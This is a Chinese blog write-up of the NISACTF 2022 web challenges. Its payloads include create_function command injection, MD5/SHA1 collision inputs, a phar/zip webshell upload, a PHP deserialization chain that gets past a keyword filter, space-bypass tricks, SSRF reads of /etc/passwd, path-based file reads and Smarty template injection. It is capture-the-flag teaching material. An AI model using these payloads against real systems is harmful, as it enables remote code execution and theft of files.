NISACTF2022公开通道

最新推荐文章于 2024-09-02 19:53:05 发布
最新推荐文章于 2024-09-02 19:53:05 发布
阅读量6.8k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: Write Up 文章标签: 学习 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/123784227

NISACTF2022公开通道

题目

checkin

urlencode,因为解释器读取出来的才是真正的顺序

ahahahaha=jitanglailo&&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6+Flag%21%E2%81%A9%E2%81%A6N1SACTF

level_up

第一层 robots.txt

第二层 md5碰撞

array1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&array2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

第三层 sha1碰撞

array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

第四层 parse_url解析漏洞

url传 /// 即可

第五层create_function()注入

\create_function&b=}var_dump(system("cat /flag"));//

bingdundun

这个题通过自己的fuzz,再加百度就做出来了

将shell.php打包成压缩包,phar协议解压 + zip文件shell

注意:phar用相对路径,zip用绝对路径,解压得到的webshell的名字要和压缩包里的一致

webshell的路径,传payload在这个路径下,也可以用蚁剑连接
http://124.221.24.137:28821/?bingdundun=phar://eb867f50fd71ed6a57854a2363c46f60.zip/shell

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-48YWIXXI-1648394020972)(images/NISACTF2022公开通道/image-20220327200118580.png)]

babyserialize

waf.php

<?php
    function checkcheck($data){
  if(preg_match("/\`|\^|\||\~|assert|\?|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk/",$data,$match)){        
      die('something wrong');    
  }}
function hint(){    
    echo "flag is in /";    
    die();}

payload

O:9:"TianXiWei":2:{s:3:"ext";O:8:"Ilovetxw":2:{s:5:"huang";O:4:"four":1:{s:1:"a";O:4:"NISA":2:{s:3:"fun";O:8:"Ilovetxw":2:{s:5:"huang";N;s:2:"su";O:4:"NISA":2:{s:3:"fun";N;s:8:"txw4ever";s:38:"echo(s.y.s.t.e.m)('cat%09/fllllllaaag');";}}s:8:"txw4ever";N;}}s:2:"su";N;}s:1:"x";s:9:"sixsixsix";}

payload里面的空格代替找了好久

记录下

<符号
$IFS(好像有问题)
${IFS}
$IFS$9
%09用于url传递
cat</flag

babyupload

这个题给源码了,审计发现可能是任意文件读取,关键代码在这里

 with open(os.path.join("uploads/", res[0]), "r") as f:
        return f.read()

当res[0]为绝对路径时,打开的就是绝对路径,不会进行拼接

所以用burp修改文件名为 /flag,跳转就读取到/flag文件了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RdLO9i2b-1648394020973)(images/NISACTF2022公开通道/image-20220327195329167.png)]

easyssrf

url参数存在ssrf漏洞,测试协议file、gopher、http,看能否读取文件,常用的文件

file、http协议都能用

/etc/passwd
/etc/hosts
/var/www/html/index.php

读取/flag的时候有提示,存在/fl4g

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ge8pDR6V-1648394020974)(images/NISACTF2022公开通道/image-20220327194718167.png)]

/fl4gt提示有另一个文件ha1x1ux1u.php

<?php

highlight_file(__FILE__);
error_reporting(0);

$file = $_GET["file"];
if (stristr($file, "file")){
  die("你败了.");
}

//flag in /flag
echo file_get_contents($file);

没有丝毫的过滤,传?file=/flag就能获得flag

is secret(原题)

参考[CISCN2019 华东南赛区]Double Secret

popchain(原题)

参考文章

这个题,我在做babyserialize的时候看到原题了,改下变量名能直接打,可是出题人竟然把flag的位置提示错了,错失一血

middlevel(原题)

smarty模板注入

payload如下

X-Forwarded-For: {if readfile('/flag')}{/if}
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 778
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
关于[NISACTF 2022]babyserialize详解
weixin_57222016的博客
05-06 2570
前言 先甩出PHP的魔术方法。 __invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法 __construst():具有构造函数的类在创建新对象的时候,回调此方法 __destruct():反序列化的时候,或者对象销毁的时候调用 __wakeup():反序列化的时候调用 __sleep():序列化的时候调用 __toString():把类当成字符串的时候调用,一般在echo处生效 __set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
[NISACTF 2022]
snowlyzz的博客
09-09 6474
NISACTF部分WP
2022NISACTF
unexpectedthing的博客
07-13 1794
NISACTF
[NISACTF 2022]checkin
2302_81393479的博客
02-17 771
一进来就看到叫我们用get方式传两个参,可以发现传参后没用。复制代码到vscode看了一下,结果发现有Unicode特殊字符。可以看到第一个变量正常,并没有特殊字符在那段代码里,而第二个变量则有特殊字符在里面,所以我们要对第二个变量:Ugeiwo⁩⁦cuishiyuan 与其对应的值:Flag!做这道题有点懵,最后还是问了一下研究生师姐才做出来,实属不易。),最后就是传参构造。
NISACTF 2022 MISC 部分WP
qq_51447967的博客
04-28 2558
[NISACTF 2022]bilala二维码 题目提示如下 bilala说,里面会不会还藏着什么东西呢,图片分辨率好像有用诶,压缩包密码好像和战队名字相关 下载得到一张缺少定位符号的二维码,手动补全,然后扫描。 扫描得到一个URL,如下 https://video.gz2.com.cn/h666G/h666G_kzwIVy 进去下载得到一张图片,如下 对图片进行分析 可以看到第一张图片后面又附加了一张图片,然后第二张图片后面有个压缩包,全部提取出来。 看了下图片没有发现什么,然后去分析压
[NISACTF 2022]流量包里有个熊做题笔记及心得
2301_79424186的博客
03-19 462
这道题不难但是涉及的地方挺多的,根据SS猜到FF开头的JPG再想到rot13就体现了典型的MISC思想,虽然有更抽象的(
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 5016
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
[NISACTF 2022]easyssrf
2301_80218721的博客
09-02 860
将得到的进行base64解码就能得到flag。害羞羞,试试其他路径?
[NISACTF 2022]bilala二维码
lzx13290757580的博客
04-28 274
还有一个是像素我找不到。
[NISACTF 2022]easyssrf Leaderchen
qq_73767109的博客
06-24 401
这里主要是因为不是在index.php中而在别的php文件中,可能会存在遍历。存在文件包含,利用file协议读取flag失败。访问ha1x1ux1u.php发现源码。可以使用php协议中的filter来读取。这里也可以使用写入链的方式读取。利用file协议读取。应该是过滤了file。得base64加密的。
[NISACTF 2022]easyssrf wp(SSRF入门)
Leaf_initial的博客
04-11 2167
curl_init(url)函数初始化一个新的会话,返回一个cURL句柄,供curl_setopt(),curl_exec()和curl_close() 函数使用。上述测试代码中,file_get_contents() 函数将整个文件或一个url所指向的文件读入一个字符串中,并展示给用户,我们构造类似。函数,应该是防止通过file变量进行file协议读取,所以将file命令过滤掉,无所谓,我们可以直接利用file变量来进行读取文件。我们通常要利用filex协议来进行文件读取,下面是file的最简单的用法。
NISACTF_WriteUp
热门推荐
The code way of kinnisoy
03-28 1万+
WriteUp 文章目录WriteUpWEBcheckinlevel-upis secretPWNReorPwn?CRYPTOsign_cryptofunnycaesernormalxorMISC签到huaji?bqtwhere_is_here不愉快的地方福利题问卷 WEB checkin 题目: 以为白给题,结果输入不对,f12查看源码。发现一些奇怪的东西: down了源码,本地打开复制‮⁦Ugeiwo⁩⁦cuishiyuan Payload: http://120.27.195.236:28990/
NISACTF2023 WP
qq_41252520的博客
04-16 675
2年多没玩CTF了,pwn显得手生了不少,我的PWN环境已经在硬盘的某个角落里吃灰了。今天参加了一场校赛,捣鼓了一下午,Reverse和PWN都AK了。其实比赛是新手向,没啥难度,不过有道PWN设计的比较巧妙,got了两个tips,也就是今天将要分享的。
pie保护 pwn 例题
最新发布
01-06
考虑一道名为“ezpie”的题目来自NISACTF 2022竞赛[^2]。此题提供了一个易受攻击的服务端应用,它虽然启用了PIE特性却未能充分设置栈溢出防护机制。这意味着如果能够绕过ASLR的影响,则有可能实现远程代码执行。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值